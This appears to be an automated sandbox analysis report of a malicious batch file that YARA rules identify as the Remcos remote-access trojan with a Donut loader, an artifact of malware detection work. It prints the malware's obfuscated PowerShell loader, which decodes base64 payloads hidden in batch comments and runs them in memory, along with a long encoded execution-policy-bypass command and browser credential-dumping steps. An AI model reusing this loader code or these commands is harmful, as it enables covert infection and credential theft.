Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0040612B	12_2_0040612B
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0043E13D	12_2_0043E13D
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044B188	12_2_0044B188
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00442273	12_2_00442273
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044D380	12_2_0044D380
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044A5F0	12_2_0044A5F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_004125F6	12_2_004125F6
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_004065BF	12_2_004065BF
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_004086CB	12_2_004086CB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_004066BC	12_2_004066BC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044D760	12_2_0044D760
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00405A40	12_2_00405A40
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00449A40	12_2_00449A40
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00405AB1	12_2_00405AB1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00405B22	12_2_00405B22
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044ABC0	12_2_0044ABC0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00405BB3	12_2_00405BB3
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00417C60	12_2_00417C60
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044CC70	12_2_0044CC70
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00418CC9	12_2_00418CC9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044CDFB	12_2_0044CDFB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044CDA0	12_2_0044CDA0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044AE20	12_2_0044AE20
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00415E3E	12_2_00415E3E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00437F3B	12_2_00437F3B
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00405038	13_2_00405038
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0041208C	13_2_0041208C
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_004050A9	13_2_004050A9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0040511A	13_2_0040511A
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0043C13A	13_2_0043C13A
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_004051AB	13_2_004051AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00449300	13_2_00449300
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0040D322	13_2_0040D322
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044A4F0	13_2_0044A4F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0043A5AB	13_2_0043A5AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00413631	13_2_00413631
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00446690	13_2_00446690
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044A730	13_2_0044A730
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_004398D8	13_2_004398D8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_004498E0	13_2_004498E0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0044A886	13_2_0044A886
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0043DA09	13_2_0043DA09
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00438D5E	13_2_00438D5E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00449ED0	13_2_00449ED0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0041FE83	13_2_0041FE83
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00430F54	13_2_00430F54
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004050C2	16_2_004050C2
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004014AB	16_2_004014AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00405133	16_2_00405133
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004051A4	16_2_004051A4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00401246	16_2_00401246
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_0040CA46	16_2_0040CA46
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00405235	16_2_00405235
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004032C8	16_2_004032C8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00401689	16_2_00401689
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00402F60	16_2_00402F60

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 0044DDB0 appears 33 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00418555 appears 34 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 004186B6 appears 58 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 004188FE appears 88 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00413025 appears 79 times

Very long command line found

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 7332
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 7332			Jump to behavior

Yara signature match

Source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000005.00000002.3689629684.000000000AA0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000005.00000002.3674098163.0000000006A82000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000005.00000002.3668466296.00000000066EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 5.2.powershell.exe.99a1408.7.raw.unpack, chnomklatz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.powershell.exe.89d0000.4.raw.unpack, chnomklatz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.powershell.exe.6610aa0.1.raw.unpack, chnomklatz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.powershell.exe.99013e8.8.raw.unpack, chnomklatz.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 5.2.powershell.exe.99a1408.7.raw.unpack, chnomklatz.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.powershell.exe.99a1408.7.raw.unpack, chnomklatz.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.powershell.exe.89d0000.4.raw.unpack, chnomklatz.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.powershell.exe.89d0000.4.raw.unpack, chnomklatz.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.powershell.exe.6610aa0.1.raw.unpack, chnomklatz.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.powershell.exe.6610aa0.1.raw.unpack, chnomklatz.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.powershell.exe.99013e8.8.raw.unpack, chnomklatz.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.powershell.exe.99013e8.8.raw.unpack, chnomklatz.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winBAT@17/10@27/2

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_0041A225 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,

12_2_0041A225

Source: C:\Windows\SysWOW64\recover.exe

Code function: 16_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,

16_2_00410DE1

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_0041A6AF GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,

12_2_0041A6AF

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_00415799 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,

12_2_00415799

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_00416A46 FindResourceW,SizeofResource,LoadResource,LockResource,

12_2_00416A46

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\dwm.bat

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvmfia32.sx0.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z310517827.bat" "

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$evuto.CopyTo($avier);$evuto.Dispose();$pysls.Dispose();$avier.Dispose();$avier.ToArray();}function kjgun($param_var,$param2_var){$qhonl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);$wstpn=$qhonl.EntryPoint;$wstpn.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $jmdom;$uxzeu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jmdom).Split([Environment]::NewLine);foreach ($kbqsw in $uxzeu) {if ($kbqsw.StartsWith(':: ')){$hzwcr=$kbqsw.Substring(3);break;}}$gezfo=[string[]]$hzwcr.Split('\');$kcecj=ebqqx (zihtg ([Convert]::FromBase64String($gezfo[0])));$cutbf=ebqqx (zihtg ([Convert]::FromBase64String($gezfo[1])));kjgun $kcecj $null;kjgun $cutbf (,[string[]] ('%*'));@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recycleb

Source: C:\Windows\SysWOW64\recover.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\SysWOW64\recover.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: recover.exe, recover.exe, 0000000D.00000002.1559064560.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: recover.exe, 0000000C.00000002.1572510923.00000000047CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: z310517827.bat

Virustotal: Detection: 9%

Source: C:\Windows\SysWOW64\recover.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z310517827.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\z310517827.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXcmlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\ymieiytvun"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\bgnxiqeoiwifqy"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\z310517827.bat"	Jump to behavior
